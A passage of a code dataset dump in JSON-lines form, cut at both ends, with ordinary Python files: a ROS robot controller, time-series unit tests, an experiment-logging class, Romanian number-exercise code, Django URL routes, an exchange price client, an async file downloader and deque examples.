58 63 64 65 67 70 74 78 79 81 82 84 87 91 93\n#https://rosettacode.org/wiki/Largest_int_from_concatenated_ints#Python:_Sort_on_comparison_of_concatenated_ints_method","sub_path":"week3_greedy_algorithms/4_collecting_signatures/covering_segments3.py","file_name":"covering_segments3.py","file_ext":"py","file_size_in_byte":2333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"529839601","text":"#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom tf2_geometry_msgs import Vector3Stamped\nfrom geometry_msgs.msg import TransformStamped\nfrom std_msgs.msg import Float64\nimport tf2_ros\nimport tf_conversions\n\n'''\nLateral input: x and y in \"absolute\" (IMU) frame\nRotational input: IMU frame degrees\nThis needs to be transformed into \"robot\" frame (X is forward)\nAt each timestep:\n Rotate input x/y into robot frame\n Publish:\n linear:\n x: rotated input\n y: rotated input\n z: PID output with input setpoint (no transformation)\n angular\n x: 0\n y: 0\n z: PID output with input setpoint (no transformation)\nQuestions for Ore:\n - Absolute vs. Relative\n - Mutex on goal pose publisher?\n - tf transformations\n \n'''\n\n\nclass Controller:\n twist_state = Twist()\n yaw_control_out = 0.0\n depth_control_out = 0.0\n\n yaw = 0.0\n max_lateral_speed = 0.4\n world_goal = None\n\n def goal_callback(self, twist: Twist):\n self.depth_set_pub.publish(twist.linear.z)\n self.yaw_set_pub.publish(twist.angular.z)\n self.world_goal = Vector3Stamped()\n self.world_goal.vector.x = twist.linear.x\n self.world_goal.vector.y = twist.linear.y\n self.world_goal.header.frame_id = \"map\"\n\n def depth_control_callback(self, controller_output: Float64):\n self.depth_control_out = controller_output.data\n\n def yaw_control_callback(self, controller_output: Float64):\n self.yaw_control_out = controller_output.data\n\n def __init__(self):\n rospy.init_node('controller', anonymous=False)\n rate = rospy.Rate(20)\n\n rospy.Subscriber(\"wolf_control/goal\", Twist, self.goal_callback)\n rospy.Subscriber(\"wolf_control/yaw_output\", Float64, self.yaw_control_callback)\n rospy.Subscriber(\"wolf_control/depth_output\", Float64, self.depth_control_callback)\n\n\n self.yaw_set_pub = rospy.Publisher(\"wolf_control/yaw_setpoint\", Float64, queue_size=10)\n self.depth_set_pub = rospy.Publisher(\"wolf_control/depth_setpoint\", Float64, queue_size=10)\n self.yaw_state_pub = rospy.Publisher(\"wolf_control/yaw_state\", Float64, queue_size=10)\n self.depth_state_pub = rospy.Publisher(\"wolf_control/depth_state\", Float64, queue_size=10)\n self.vel_pub = rospy.Publisher(\"cmd_vel\", Twist, queue_size=10)\n\n tf_buffer = tf2_ros.Buffer()\n listener = tf2_ros.TransformListener(tf_buffer)\n\n while not rospy.is_shutdown():\n\n #get the current robot position and give the appropriate pieces to the PID controllers\n try:\n odom = tf_buffer.lookup_transform(\"map\", \"odom\", rospy.Time(0))\n\n #publish yaw & depth\n rot = (odom.transform.rotation.x, odom.transform.rotation.y, odom.transform.rotation.z, odom.transform.rotation.w)\n self.yaw_state_pub.publish(tf_conversions.transformations.euler_from_quaternion(rot)[2]) \n self.depth_state_pub.publish(odom.transform.translation.z)\n\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):\n print(\"failed to get transform\")\n pass\n\n #set thrusters to move according to movement controllers\n cmd_vel = Twist()\n cmd_vel.linear.z = self.depth_control_out\n cmd_vel.angular.z = self.yaw_control_out\n \n if self.world_goal:\n try:\n hull_goal = tf_buffer.transform(self.world_goal, 'odom')\n cmd_vel.linear.x = hull_goal.vector.x\n cmd_vel.linear.y = hull_goal.vector.y\n except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):\n pass\n\n self.vel_pub.publish(cmd_vel)\n rate.sleep()\n\n\nif __name__ == '__main__':\n controller = Controller()\n","sub_path":"wolf_control/scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"454485637","text":"import utils\nimport unittest\nimport numpy as np\nimport pandas as pd\nimport math\n\nclass TestUtils(unittest.TestCase):\n\n #example test for test's workflow purposes\n def test_segment_parsion(self):\n self.assertTrue(True)\n \n def test_confidence_all_normal_value(self):\n segment = [1, 2, 0, 6, 8, 5, 3]\n utils_result = utils.find_confidence(segment)\n result = 1.6\n relative_tolerance = 1e-2\n self.assertTrue(math.isclose(utils_result, result, rel_tol = relative_tolerance))\n \n def test_confidence_all_nan_value(self):\n segment = [np.NaN, np.NaN, np.NaN, np.NaN]\n self.assertEqual(utils.find_confidence(segment), 0)\n \n def test_confidence_with_nan_value(self):\n data = [np.NaN, np.NaN, 0, 8]\n utils_result = utils.find_confidence(data)\n result = 1.6\n relative_tolerance = 1e-2\n self.assertTrue(math.isclose(utils_result, result, rel_tol = relative_tolerance))\n \n def test_interval_all_normal_value(self):\n data = [1, 2, 1, 2, 4, 1, 2, 4, 5, 6]\n data = pd.Series(data)\n center = 4\n window_size = 2\n result = [1, 2, 4, 1, 2]\n self.assertEqual(list(utils.get_interval(data, center, window_size)), result)\n \n def test_interval_wrong_ws(self):\n data = [1, 2, 4, 1, 2, 4]\n data = pd.Series(data)\n center = 3\n window_size = 6\n result = [1, 2, 4, 1, 2, 4]\n self.assertEqual(list(utils.get_interval(data, center, window_size)), result)\n \n def test_subtract_min_without_nan(self):\n segment = [1, 2, 4, 1, 2, 4] \n segment = pd.Series(segment)\n result = [0, 1, 3, 0, 1, 3]\n utils_result = list(utils.subtract_min_without_nan(segment))\n self.assertEqual(utils_result, result)\n \n def test_subtract_min_with_nan(self):\n segment = [np.NaN, 2, 4, 1, 2, 4]\n segment = pd.Series(segment)\n result = [2, 4, 1, 2, 4]\n utils_result = list(utils.subtract_min_without_nan(segment)[1:])\n self.assertEqual(utils_result, result)\n \n def test_get_convolve(self):\n data = [1, 2, 3, 2, 2, 0, 2, 3, 4, 3, 2, 1, 1, 2, 3, 4, 3, 2, 0]\n data = pd.Series(data)\n pattern_index = [2, 8, 15]\n window_size = 2\n av_model = [1, 2, 3, 2, 1]\n result = []\n self.assertNotEqual(utils.get_convolve(pattern_index, av_model, data, window_size), result)\n \n def test_get_convolve_with_nan(self):\n data = [1, 2, 3, 2, np.NaN, 0, 2, 3, 4, np.NaN, 2, 1, 1, 2, 3, 4, 3, np.NaN, 0]\n data = pd.Series(data)\n pattern_index = [2, 8, 15]\n window_size = 2\n av_model = [1, 2, 3, 2, 1]\n result = utils.get_convolve(pattern_index, av_model, data, window_size)\n for val in result:\n self.assertFalse(np.isnan(val))\n \n def test_get_convolve_empty_data(self):\n data = []\n pattern_index = []\n window_size = 2\n av_model = []\n result = []\n self.assertEqual(utils.get_convolve(pattern_index, av_model, data, window_size), result)\n \n def test_get_distribution_density(self):\n segment = [1, 1, 1, 3, 5, 5, 5]\n segment = pd.Series(segment)\n result = (3, 5, 1)\n self.assertEqual(utils.get_distribution_density(segment), result)\n \n def test_find_jump_parameters_center(self):\n segment = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n segment = pd.Series(segment)\n jump_center = [10, 11]\n self.assertIn(utils.find_jump_parameters(segment, 0)[0], jump_center)\n \n def test_find_jump_parameters_height(self):\n segment = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n segment = pd.Series(segment)\n jump_height = [3.5, 4]\n self.assertGreaterEqual(utils.find_jump_parameters(segment, 0)[1], jump_height[0])\n self.assertLessEqual(utils.find_jump_parameters(segment, 0)[1], jump_height[1])\n \n def test_find_jump_parameters_length(self):\n segment = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n segment = pd.Series(segment)\n jump_length = 2\n self.assertEqual(utils.find_jump_parameters(segment, 0)[2], jump_length)\n \n def test_find_drop_parameters_center(self):\n segment = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n segment = pd.Series(segment)\n drop_center = [14, 15]\n self.assertIn(utils.find_drop_parameters(segment, 0)[0], drop_center)\n \n def test_find_drop_parameters_height(self):\n segment = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n segment = pd.Series(segment)\n drop_height = [3.5, 4]\n self.assertGreaterEqual(utils.find_drop_parameters(segment, 0)[1], drop_height[0])\n self.assertLessEqual(utils.find_drop_parameters(segment, 0)[1], drop_height[1])\n \n def test_find_drop_parameters_length(self):\n segment = [5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n segment = pd.Series(segment)\n drop_length = 2\n self.assertEqual(utils.find_drop_parameters(segment, 0)[2], drop_length)\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"analytics/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":5379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"57778712","text":"import os\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nimport git\nimport logging\n\nINDEPENDENT_DATA=\"independent_data\"\nDEPENDENT_DATA=\"dependent_data\"\n\nclass Trial:\n __name = \"\"\n __trials_dir = \"\"\n __trial_dir = \"\"\n __logfile = \"\"\n __description = \"\"\n __data = {}\n __cv_fn = None\n __solve_model = None\n __solution = None\n __eval_metrics = None\n\n def __init__(self, name, description, trials_dir = \"trials/\"):\n self.__start_time = datetime.now()\n self.__name = name\n self.__description = description\n self.__trials_dir = trials_dir\n self.__trial_dir = self.__trials_dir + name + \"/\" + self.get_start_time_str() + \"/\"\n self.__data_dir = self.__trial_dir + \"data/\"\n self.__logfile = self.__trial_dir + name + \".log\"\n\n self.create_trial_dir()\n self.remove_log_file()\n\n # hack to work around the fact that qtconsole adds a handler to the root logger when running script from within Spyder\n # taken from here: https://stackoverflow.com/questions/24259952/logging-module-does-not-print-in-ipython\n root = logging.getLogger()\n for handler in root.handlers[:]:\n root.removeHandler(handler)\n logging.basicConfig(filename = self.__logfile, level = logging.INFO, format='%(asctime)s %(levelname)s: %(message)s',datefmt='%Y-%m-%d %H:%M:%S' )\n\n self.log_info(\"Trial: \" + self.__name)\n self.log_info(\"Description: \" + self.__description)\n self.log_most_recent_commits()\n\n def get_start_time_str(self):\n return self.__start_time.strftime(\"%Y%m%d_%H%M%S\")\n\n # finds the root of this git repository that the supplied path is in\n # helper function to log_most_recent_commits()\n # taken from: https://stackoverflow.com/questions/22081209/find-the-root-of-the-git-repository-where-the-file-lives\n def get_git_root(self, path):\n git_repo = git.Repo(path, search_parent_directories=True)\n git_root = git_repo.git.rev_parse(\"--show-toplevel\")\n return git_root\n\n # formats commit info for logging\n # helper function to log_most_recent_commits()\n def format_commit_info(self, commit):\n commit_hash = commit[1]\n commit_ts_str = str(commit[3][0])\n commit_tz_str = str(commit[3][1])\n commit_msg = commit[4]\n return \" \".join([commit_hash, commit_ts_str, commit_tz_str, commit_msg])\n\n # function to log the most recent commits in the repository, for better reproducibility of the result\n def log_most_recent_commits(self, num_commits = 3):\n git_root = self.get_git_root(\".\")\n repo = git.Repo(git_root)\n cur_branch_name = repo.active_branch.name\n cur_branch_log = repo.active_branch.log()\n total_commits = len(cur_branch_log)\n commits_to_log = cur_branch_log[(total_commits - num_commits):]\n commits_to_log.reverse() # print most recent commit first, like git does\n\n logging.info(\"::::: Git repository info :::::\")\n logging.info(\"\")\n logging.info(\"Current branch: \" + cur_branch_name)\n logging.info(\"\")\n logging.info(\"Latest commits (most recent commit first):\")\n logging.info(\"\")\n for commit in commits_to_log:\n logging.info(self.format_commit_info(commit))\n\n logging.info(\"\")\n\n # function that is accessible from outside the class, to enable client scripts to log arbitrary information\n def log_info(self, msg):\n if type(msg) == list:\n for line in msg:\n logging.info(line)\n else:\n logging.info(msg)\n logging.info(\"\")\n\n # if parent directory doesn't exist, create it\n def create_trial_dir(self):\n if not os.path.exists(self.__trial_dir):\n os.makedirs(self.__trial_dir)\n\n def create_data_dir(self):\n if not os.path.exists(self.__data_dir):\n os.makedirs(self.__data_dir)\n\n def get_trial_dir(self):\n return self.__trial_dir\n\n def get_name(self):\n return self.__name\n\n def remove_log_file(self):\n if os.path.exists(self.__logfile):\n os.remove(self.__logfile)\n\n def conclude_trial(self):\n self.create_data_dir()\n for key, value in self.__data.iteritems():\n self.save_data_item(value, key)\n\n self.save_eval_metrics()\n self.save_solution()\n self.__plot_soln_fn(self.__solution)\n\n def get_logfile(self):\n return self.__logfile\n\n def set_description(self, description):\n self.__description = description\n\n def set_independent_data(self, A):\n self.__data[INDEPENDENT_DATA] = A\n\n def set_dependent_data(self, b):\n self.__data[DEPENDENT_DATA] = b\n\n def get_independent_data(self):\n return self.__data[INDEPENDENT_DATA]\n\n def get_dependent_data(self):\n return self.__data[DEPENDENT_DATA]\n\n def set_cv_fn(self, fn):\n self.__cv_fn = fn\n\n def set_solution_fn(self, fn):\n self.__solve_model = fn\n\n def set_plot_solution_fn(self, fn):\n self.__plot_soln_fn = fn\n\n def save_data_item(self, data_item, name):\n filename = self.__data_dir + name + \".csv\"\n if isinstance(data_item, np.ndarray):\n np.savetxt(filename, data_item)\n elif isinstance(data_item, pd.DataFrame):\n data_item.to_csv(filename)\n\n def save_eval_metrics(self):\n filename = self.__trial_dir + self.__name + \"_eval_metrics.csv\"\n if isinstance(self.__eval_metrics, np.ndarray):\n np.savetxt(filename, self.__eval_metrics)\n elif isinstance(self.__eval_metrics, pd.DataFrame):\n self.__eval_metrics.to_csv(filename, float_format='%.2f')\n\n def save_solution(self):\n filename = self.__trial_dir + self.__name + \"_solution.csv\"\n if isinstance(self.__solution, np.ndarray):\n np.savetxt(filename, self.__solution)\n elif isinstance(self.__solution, pd.DataFrame):\n self.__solution.to_csv(filename, float_format='%.2f')\n\n def run(self):\n eval_metrics = self.__cv_fn(self.get_independent_data(), self.get_dependent_data())\n self.__eval_metrics = eval_metrics\n self.__solution = self.__solve_model(self.get_independent_data(), self.get_dependent_data())\n self.conclude_trial()\n","sub_path":"trial.py","file_name":"trial.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"242187938","text":"def get_largest_prime_below(n):\n '''\n Găsește ultimul număr prim mai mic decât un număr dat.\n :param n: un numar natural\n :return: ultimul numar prim mai mic decat numarul dat\n '''\n if n<=2:\n return (\"Nu exista un astfel de numar\")\n else:\n for i in range(n - 1, 1, -1):\n verify = 1\n j = 2\n while j * j <= i and verify == 1:\n if i % j == 0:\n verify = 0\n else:\n j = j + 1\n if verify == 1:\n return i\n\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(2)==\"Nu exista un astfel de numar\"\n assert get_largest_prime_below(5)==3\n assert get_largest_prime_below(999)==997\n assert get_largest_prime_below(21)==19\n\ndef is_superprime(n):\n '''\n Determină dacă un număr este superprim: dacă toate prefixele sale sunt prime. De exemplu, 233 este superprim,\ndeoarece 2, 23 și 233 sunt toate prime, dar 237 nu este superprim, deoarece 237 nu este prim\n :param n: un numar natural\n :return: True|False\n '''\n if n<2 :\n return False\n while n :\n if n < 2 :\n return False\n i=2\n while i*i <= n:\n if n%i==0:\n return False\n i=i+1\n n=n//10\n return True\n\ndef test_is_superprime():\n assert is_superprime(2)==1\n assert is_superprime(23)==1\n assert is_superprime(233)==1\n assert is_superprime(237)==0\n\ndef is_palindrome(n) :\n '''\n Verifica daca un numar este palindrom\n :param n: numar narural\n :return: True|False\n '''\n nr=0\n n2=n\n while n :\n nr=nr*10 + n%10\n n=n//10\n if nr==n2 :\n return 1\n else: return 0\n\ndef test_is_palindrome():\n assert is_palindrome(77)==1\n assert is_palindrome(21)==0\n\n\ndef main ():\n while True:\n print(\"Alege o optune de mai jos: \")\n print(\"1. Găsește ultimul număr prim mai mic decât un număr dat. \")\n print(\"2. Determină dacă un număr este superprim. \")\n print(\"3. Verifica daca un numar este palindrom\")\n print(\"4. Iesire\")\n\n optiune=int(input(\"Dati optiunea \"))\n\n if optiune==1:\n opt1=1\n test_get_largest_prime_below()\n print(\"Algoritmul alegerii a trecut testele de baza \")\n while opt1==1 :\n numar = int(input(\"Dati numarul pt care vreti sa verificati \"))\n afisare = get_largest_prime_below(numar)\n print(\"Rezultatul este \" + str(afisare))\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt1=int(input())\n while opt1>2:\n print(\"Optiune gresita\")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt1 = int(input())\n elif optiune==2:\n opt2=1\n test_is_superprime()\n print(\"Algoritmul alegerii a trecut testele de baza \")\n while opt2==1 :\n numar = int(input(\"Dati numarul pt care vreti sa verificati \"))\n afisare = is_superprime(numar)\n if afisare :\n print(\"Numarul este superprim \")\n else:\n print(\"Numarul nu este superprim \")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt2=int(input())\n while opt2>2:\n print(\"Optiune gresita\")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt2 = int(input())\n elif optiune ==3:\n opt3 = 1\n test_is_palindrome()\n print(\"Algoritmul alegerii a trecut testele de baza \")\n while opt3 == 1:\n numar = int(input(\"Dati numarul pt care vreti sa verificati \"))\n afisare = is_palindrome(numar)\n if afisare:\n print(\"Numarul este palindrom\")\n else:\n print(\"Numarul nu este palindrom \")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt3 = int(input())\n while opt3 > 2:\n print(\"Optiune gresita\")\n print(\"Alegeti o optiune: \")\n print(\"1. Pentru a verifica alt numar \")\n print(\"2. Pentru a te intoarce la meniu \")\n opt3 = int(input())\n\n\n elif optiune==4 :\n break\n else :\n print(\"Optiune gresita. \")\n\nif __name__ == '__main__':\n main()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"497591055","text":"from django.urls import path\n\nfrom projects import views\nfrom projects.views import ProjectsListView, ProjectDetailsView, ProjectCreateView, MoreProjectDetailsView, \\\n FullScreenView, EditView, DeleteView, EditMoreProjectDetailsView, DeleteProjectDetailsView, AboutView, \\\n MyProjectsListView\n\nurlpatterns = [\n path('', ProjectsListView.as_view(), name='index'),\n path('/', MyProjectsListView.as_view(), name='my_projects'),\n path('details//', ProjectDetailsView.as_view(), name='details'),\n path('create/', ProjectCreateView.as_view(), name='create'),\n path('add_more_details//', views.project_create_form_view, name='add_more_details'),\n path('all_project_details//', MoreProjectDetailsView.as_view(), name='all_project_details'),\n path('full_screen//', FullScreenView.as_view(), name='full_screen'),\n path('update_project//', EditView.as_view(), name='update_project'),\n path('delete//', DeleteView.as_view(), name='delete'),\n path('update_moredetails//', EditMoreProjectDetailsView.as_view(), name='update_moredetails'),\n path('delete_project_details//', DeleteProjectDetailsView.as_view(), name='delete_project_details'),\n path('/about/', AboutView.as_view(), name='about'),\n]","sub_path":"architects/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"392523603","text":"\"\"\"\nAPI for Ethex (ethex.market)\n\nhttps://api.ethex.market:5055/ticker24\n\ndata = \n{\n \"ETH_BAT\": {\n \"last\": null,\n \"lowestAsk\": \"0.00131868\",\n \"highestBid\": \"0.001014\",\n \"volume\": \"0\",\n \"high24hr\": null,\n \"low24hr\": null\n },\n \"ETH_DAI\": {\n \"last\": null,\n \"lowestAsk\": \"0.00494096\",\n \"highestBid\": \"0.004627456\",\n \"volume\": \"0\",\n \"high24hr\": null,\n \"low24hr\": null\n },\n ...\n\"\"\"\nimport time\nimport logging\nimport socket\ntry:\n from urllib.request import urlopen, Request\nexcept:\n from urllib import urlopen, Request\n\nfrom urllib.error import URLError\n\nimport json\n\nimport pprint\n\nfrom weighted_average import WeightedAverage\n\n\nclass EthexAPI():\n def __init__(self, currency_symbol=\"0xBTC\"):\n self._SERVER_URL = \"https://api.ethex.market:5055\"\n self.currency_symbol = currency_symbol\n self.api_name = \"Ethex\"\n self.short_url = \"https://bit.ly/2SrmIl6\"\n self.last_updated_time = 0\n self.price_eth = None\n self.price_usd = None\n self.price_btc = None\n self.volume_usd = None\n self.volume_eth = None\n self.volume_btc = None\n self.change_24h = None\n self.eth_price_usd = None\n self.btc_price_usd = None\n\n def _update(self, timeout=10.0):\n method = \"/ticker24\"\n\n req = Request(\n self._SERVER_URL+method, \n data=None, \n headers={\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36'\n }\n )\n response = urlopen(req, timeout=timeout)\n response = response.read().decode(\"utf-8\") \n try:\n data = json.loads(response)\n except json.decoder.JSONDecodeError:\n if \"be right back\" in response:\n raise TimeoutError(\"api is down - got 404 page\")\n else:\n \traise TimeoutError(\"api sent bad data ({})\".format(repr(response)))\n\n for pair_name in data:\n base_pair, currency = pair_name.split('_')\n # skip reverse-pairings\n if currency != self.currency_symbol:\n continue\n\n try:\n if base_pair == \"BTC\":\n self.price_btc = float(data[pair_name]['last'])\n self.volume_btc = float(data[pair_name]['volume'])\n if base_pair == \"ETH\":\n self.price_eth = float(data[pair_name]['last'])\n self.volume_eth = float(data[pair_name]['volume'])\n except TypeError as e:\n raise TimeoutError(\"Could not convert data to float\") from e\n\n if self.currency_symbol == \"ETH\":\n self.price_eth = 1\n self.eth_price_usd = self.price_usd\n if self.currency_symbol == \"BTC\":\n self.price_btc = 1\n self.btc_price_usd = self.price_usd\n\n def update(self, timeout=10.0):\n try:\n self._update(timeout=timeout)\n except (TimeoutError,\n ConnectionResetError,\n ConnectionRefusedError,\n socket.timeout,\n socket.gaierror,\n URLError) as e:\n logging.warning('api timeout {}: {}'.format(self.api_name, str(e)))\n else:\n self.last_updated_time = time.time()\n\n def print_all_values(self):\n print(self.api_name, self.currency_symbol, 'price_eth ', repr(self.price_eth))\n print(self.api_name, self.currency_symbol, 'price_usd ', repr(self.price_usd))\n print(self.api_name, self.currency_symbol, 'price_btc ', repr(self.price_btc))\n print(self.api_name, self.currency_symbol, 'volume_usd ', repr(self.volume_usd))\n print(self.api_name, self.currency_symbol, 'volume_eth ', repr(self.volume_eth))\n print(self.api_name, self.currency_symbol, 'volume_btc ', repr(self.volume_btc))\n print(self.api_name, self.currency_symbol, 'change_24h ', repr(self.change_24h))\n print(self.api_name, self.currency_symbol, 'eth_price_usd', repr(self.eth_price_usd))\n print(self.api_name, self.currency_symbol, 'btc_price_usd', repr(self.btc_price_usd))\n\nif __name__ == \"__main__\":\n\n btc_api = EthexAPI('DAI')\n btc_api.update()\n btc_api.print_all_values()\n\n oxbtc_api = EthexAPI('0xBTC')\n oxbtc_api.update()\n oxbtc_api.print_all_values()\n","sub_path":"ethex.py","file_name":"ethex.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"257306999","text":"import asyncio\nimport aiohttp\nimport uuid\nimport tqdm\nimport os\n\n\n\nclass AsyncDownload(object):\n def __init__(self, \n path=\"\", \n overwrite=False,\n files_list=[],\n sem=30, \n tcp_limit=100, \n show_progress=True, \n *args, **kwargs):\n\n if path == \"\":\n raise Exception(\"Download destination path must be set\")\n self.path = path\n os.makedirs(path, exist_ok=True)\n self.overwrite = overwrite\n self.semaphore = asyncio.Semaphore(sem)\n self.conn = aiohttp.TCPConnector(limit=tcp_limit, verify_ssl=False)\n self.show_progress = show_progress\n self.files_list = files_list\n super().__init__()\n \n\n async def extract_filename_extension(self, file_url):\n relative_path, filename = os.path.split(file_url)\n basename, extension = os.path.splitext(filename)\n return basename, extension\n \n async def file_download(self, session, obj):\n async with self.semaphore:\n url = obj.url\n path = self.path\n overwrite = self.overwrite\n basename, extension = await self.extract_filename_extension(obj.key)\n new_filename = \"{db_id}{ext}\".format(db_id=obj.db_id, ext=extension)\n final_path = os.path.join(path, new_filename)\n doesnt_exist = not os.path.exists(final_path)\n if overwrite == True or doesnt_exist == True:\n async with session.get(url) as response:\n status = response.status\n if status in range(200, 299):\n body = await response.read()\n with open(final_path, \"wb\") as f:\n f.write(body)\n return response\n else:\n return\n\n async def progress(self, tasks):\n if self.show_progress:\n responses = [await f for f in tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))]\n return responses\n return [await f for f in tasks] #tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))]\n \n async def client_run(self):\n files_list = self.files_list\n conn = self.conn\n async with aiohttp.ClientSession(connector=conn) as session:\n tasks = []\n for obj in files_list:\n tasks.append(self.file_download(session, obj))\n responses = await self.progress(tasks) #[await f for f in tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))]\n\n\n def run(self):\n loop = asyncio.get_event_loop()\n tasks = [asyncio.ensure_future(self.client_run())]\n try:\n loop.run_until_complete(asyncio.wait(tasks))\n except RuntimeError:\n pass\n\n\n\nasync_download = AsyncDownload\n\n","sub_path":"tightai/async_utils.py","file_name":"async_utils.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"457054926","text":"'''\ndeques “are a generalization of stacks and queues”.\n'''\n'''\ndeque with maxlen: When a bounded deque is full, any new items added will cause the same number of items to be popped off the other end.\n'''\nfrom collections import deque\nimport string\nd = deque(string.ascii_lowercase)\nfor letter in d:\n print(letter)\n\n'''\nappend/appendleft\nrotate(1)\n'''\nd.append('bork')\nprint (d)\n#deque(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n',\n# 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'bork'])\n\nd.appendleft('test')\nprint (d)\n#deque(['test', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',\n# 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'bork'])\n\nd.rotate(1)\nprint (d)\n#deque(['bork', 'test', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\n# 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'])\n\n'''\nSimilar to 'tail' program\n'''\nfrom collections import deque\n\n\ndef get_last(filename, n=5):\n \"\"\"\n Returns the last n lines from the file\n \"\"\"\n try:\n with open(filename) as f:\n return deque(f, n)\n except OSError:\n print(\"Error opening file: {}\".format(filename))\n raise\n ","sub_path":"Leetcode_Practice/Python Advanced/deque.py","file_name":"deque.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"234083893","text":"from flask_mysqldb import MySQL\n\nmysql = MySQL()\n\nresponses_codes = [\n {\"code\": 0, \"response\": \"OK\"},\n {\"code\": 1, \"response\": \"Requested object is not found\"},\n {\"code\": 2, \"response\": \"Invalid request\"},\n {\"code\": 3, \"response\": \"Incorrect request(semantically)\"},\n {\"code\": 4, \"response\": \"Undefined error\"},\n {\"code\": 5, \"response\": \"User/Forum is already exists\"}\n]\n","sub_path":"extensions.py","file_name":"extensions.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"523380518","text":"#!/usr/bin/env python\n# -*- coding: utf8 -*-\n\nimport pytumblr\nimport logging\n\nimport nygithub\nimport nyconfig\n\n# Authenticate via OAuth\nclient = pytumblr.TumblrRestClient(\n nyconfig.consumer_key(),\n nyconfig.consumer_secret(),\n nyconfig.oauth_token(),\n nyconfig.oauth_secret()\n)\n\ndef message(accroche,titre,msg):\n client.create_text(nyconfig.tumblr_account(), state=\"published\", slug=accroche, title=titre, body=msg)\n\ndef snapshot(msg,chemin):\n client.create_photo(nyconfig.tumblr_account(), state=\"published\", tags=[\"test\", \"photo\"], tweet=msg, data=chemin)\n\ndef upload_csv_link(jour,taille):\n logging.debug(\"Upload CSV\")\n client.create_link(nyconfig.tumblr_account(), title=\"Données du nichoir pour le %s\" % jour, url=\"https://raw.githubusercontent.com/JulienPobot/NichoirConnecte/master/csv/%s.csv\" % jour, description=\"Le fichier de %s octets est disponible contenant toutes les valeurs recueillies depuis 24h.\" % taille)\n\n","sub_path":"src/lecube/nichoir/nytumblr.py","file_name":"nytumblr.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533701648","text":"'''\r\nCreated on May 1, 2017\r\n\r\n@author: Alex.Wang\r\n'''\r\n'''\r\nCase: sort [E,X,A,M,P,L,E] in alphabetical order\r\n 1, implements selection sort \r\n 2, implements bubble sort \r\n 3, implements 